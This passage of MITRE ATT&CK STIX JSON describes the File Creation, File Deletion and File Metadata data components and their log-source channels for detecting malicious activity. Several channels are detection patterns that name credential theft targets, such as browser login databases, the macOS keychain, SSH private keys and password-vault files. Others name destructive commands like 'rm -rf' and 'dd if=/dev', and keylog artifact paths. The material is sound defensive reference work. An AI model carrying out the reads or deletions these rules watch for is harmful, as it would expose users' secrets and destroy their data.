                        {
                            "name": "macos:unifiedlog",
                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file read of sensitive directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open: Access to /var/log/system.log or related security event logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read of *.plist or .env files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read of user document directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem and process events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to /Volumes/SharePoint or network mount"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file provider subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read/write of user documents prior to upload"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "*.opvault OR *.ldb OR *.kdbx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Recent download opened or executed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Suspicious file execution on removable media path"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 17:17:05.280000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0039",
                            "external_id": "DC0039"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Creation",
                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=11"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "File creation with name starting with '.'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of browser extension .plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or creat syscalls targeting excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file creation in AV exclusion directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file creation/modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write/create"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "file write"
                        },
                        {
                            "name": "snmp:syslog",
                            "channel": "firmware write/log event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS file creation"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write/open, FIM audit"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "open/write/exec calls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .plist under /Library/Managed Preferences/"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "creat"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib files in monitored directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: New file created in system binaries or temp directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logd:file write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File IO"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Attachment files written to ~/Downloads or temporary folders"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file activity"
                        },
                        {
                            "name": "CloudTrail:PutObject",
                            "channel": "PutObject"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open/write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File Events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write, unlink"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
                            "channel": "New startup folder shortcut or binary placed in Startup directory"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or create file after .bash_history access"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_create"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "mount target path within /proc/*"
                        },
                        {
                            "name": "macos:fsevents",
                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of files with anomalous headers and entropy values"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access or modification to /lib/modules or creation of .ko files"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "drive.activity logs"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "create/write/rename in user-writable paths"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,create"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename,write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "PutObject"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "large file write originating from /mnt/usb or external mounted storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:19:16.114000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0040",
                            "external_id": "DC0040"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Deletion",
                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat on service binaries or data targets"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file deletion"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell history"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "delete action"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, openat, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, rmdir"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, rename, open"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, fs_delete"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container file operations"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "rm, clearlogs, logrotate"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Datastore file operations"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Backup",
                            "channel": "Windows Backup Catalog deletion or catalog corruption"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "/etc/fstab, /etc/systemd/*"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:33:47.956000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0059",
                            "external_id": "DC0059"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Metadata",
                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "stat and lstat syscall results on files, including inode and permission info"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path matches exclusion directories"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write after sleep delay"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setuid or setgid bit changes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setxattr or getxattr system call"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Unexpected container volume unmount + file deletion"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "App reputation telemetry"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
                        },
                        {
                            "name": "EDR:file",
                            "channel": "File Metadata Analysis (PE overlays, entropy)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to file or VM permission changes"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "Datastore file hidden or renamed unexpectedly"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Upload of file to datastore"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Storage access and file ops"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for file system permission modifications"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Datastore modification events"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Binary file hash changes outside of update/patch cycles"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission or attribute changes"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem monitoring of exec/open"
                        },
                        {
                            "name": "fwupd:logs",
                            "channel": "Firmware updates applied or failed"
                        },
                        {
                            "name": "gatekeeper/quarantine database",
                            "channel": "LaunchServices quarantine"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
                        },
                        {
                            "name": "journald:package",
                            "channel": "dpkg/apt install, remove, upgrade events"
                        },
                        {
                            "name": "journald:package",
                            "channel": "yum/dnf install or update transactions"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "event-based"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events, hash"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, elf_info, file_metadata"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "elf_info, hash, yara_matches"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Read headers and detect MIME type mismatch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events.path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Filesystem modifications to trusted paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Write or modify .desktop file in XDG autostart path"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "hash, rpm_packages, deb_packages, file_events"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
                        },
                        {
